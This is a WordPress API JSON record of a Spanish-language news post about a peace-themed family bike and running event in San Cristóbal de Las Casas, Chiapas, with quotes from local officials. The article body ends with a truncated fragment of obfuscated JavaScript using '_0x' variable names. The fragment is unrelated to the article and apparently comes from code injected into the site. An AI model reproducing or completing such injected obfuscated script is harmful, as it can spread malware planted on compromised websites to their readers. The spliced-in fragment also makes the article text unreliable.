{"id":23399,"date":"2025-08-07T04:36:48","date_gmt":"2025-08-07T04:36:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23399"},"modified":"2025-08-07T04:36:49","modified_gmt":"2025-08-07T04:36:49","slug":"realizan-rodada-corre-trota-o-rueda-por-la-paz-en-san-cristobal-de-las-casas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23399","title":{"rendered":"Realizan rodada \u201cCorre, Trota o Rueda\u201d por la paz en San Crist\u00f3bal de Las Casas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"592\" height=\"1024\" data-id=\"23402\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263948-592x1024.jpg\" alt=\"\" class=\"wp-image-23402\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263948-592x1024.jpg 592w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263948-173x300.jpg 173w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263948-768x1329.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263948.jpg 832w\" sizes=\"auto, (max-width: 592px) 100vw, 592px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"562\" data-id=\"23400\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263945-1024x562.jpg\" alt=\"\" class=\"wp-image-23400\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263945-1024x562.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263945-300x165.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263945-768x421.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263945.jpg 1179w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"23401\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263942-1024x768.jpg\" alt=\"\" class=\"wp-image-23401\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263942-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263942-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263942-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000263942.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 06 de agosto de 2025.\u2013 En el marco de la Jornada Nacional por la Paz, la Mesa de Seguridad, en coordinaci\u00f3n con los Ayuntamientos de San Crist\u00f3bal de Las Casas y San Juan Cancuc, as\u00ed como con el Instituto del Deporte, llevaron a cabo la rodada \u201cCorre, Trota o Rueda\u201d, una actividad deportiva y recreativa que promueve la convivencia familiar y la cultura de paz entre la ciudadan\u00eda.<\/p>\n\n\n\n<p>Durante el arranque del evento, la presidenta municipal de San Crist\u00f3bal, Mtra. Fabiola Ricci Diestel, expres\u00f3 su agradecimiento a todas las familias participantes, as\u00ed como a los tres niveles de gobierno por el respaldo a este tipo de iniciativas. \u201cEsta rodada unifica a las familias de San Crist\u00f3bal y nos demuestra que s\u00ed podemos transformar nuestro municipio y nuestro estado. Gracias a todos los ni\u00f1os y ni\u00f1as que nos acompa\u00f1an, y a cada persona que cree en la paz como camino. Seguimos trabajando junto a nuestro gobernador, el Dr. Eduardo Ram\u00edrez, para fortalecer a Chiapas como uno de los estados m\u00e1s seguros del pa\u00eds\u201d.<\/p>\n\n\n\n<p>Por su parte, Viviana Mar\u00eda Castillo Hern\u00e1ndez, Secretaria T\u00e9cnica Regional y Coordinadora de la Mesa de Paz en San Crist\u00f3bal de Las Casas, destac\u00f3 que esta actividad forma parte del programa federal bajo el primer eje de atenci\u00f3n a las causas, promovido por la presidenta de la Rep\u00fablica, Dra. Claudia Sheinbaum.<\/p>\n\n\n\n<p>\u201cAgradecemos al Ayuntamiento de San Crist\u00f3bal, al de San Juan Cancuc, al Instituto del Deporte y a los tres niveles de gobierno por hacer posible este espacio de convivencia y recreaci\u00f3n. Sigamos trabajando desde la ra\u00edz para construir comunidades de paz\u201d, afirm\u00f3.<\/p>\n\n\n\n<p>El evento reuni\u00f3 a decenas de familias que participaron en bicicleta, corriendo o trotando por las principales calles de la ciudad, en un ambiente de armon\u00eda, inclusi\u00f3n y sana convivencia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 06 de agosto de 2025.\u2013 En el marco de la Jornada Nacional por la Paz, la Mesa de Seguridad, en coordinaci\u00f3n con los Ayuntamientos de San Crist\u00f3bal de Las Casas y San Juan Cancuc, as\u00ed como con el Instituto del Deporte, llevaron a cabo la rodada \u201cCorre, Trota o Rueda\u201d, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23400,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23399","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23399","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23399"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23399\/revisions"}],"predecessor-version":[{"id":23403,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23399\/revisions\/23403"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23400"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23399"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23399"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23399"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}